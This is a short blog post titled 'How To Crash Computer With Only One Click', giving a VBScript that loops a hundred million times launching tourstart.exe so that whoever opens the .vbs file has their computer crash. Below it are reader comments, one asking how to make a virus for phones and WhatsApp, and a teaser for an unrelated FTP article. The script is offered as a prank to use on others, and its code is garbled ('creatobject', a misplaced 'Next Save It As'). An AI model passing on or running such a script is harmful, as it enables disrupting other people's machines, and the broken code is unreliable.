How To Crash Computer With Only One Click ?

How To Crash Computer With Only One Click

1. Open Notepad

2. Copy This Code

Dim WSHSHELL
Set
Wshshell=wscript.creatobject("wscript.shell")

Dim x
For x = 1 to 100000000
Wshshell.run "tourstart.exe"

Next Save It As Anything.vbs

Now you're done.

When anyone click on this file. It will crash the same computer.



Follow us for more information...

2 comments:

  1. Please i don't understand how you said we should edit the file

    ReplyDelete
  2. How to make virus for mobile and whatsapp

    ReplyDelete

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...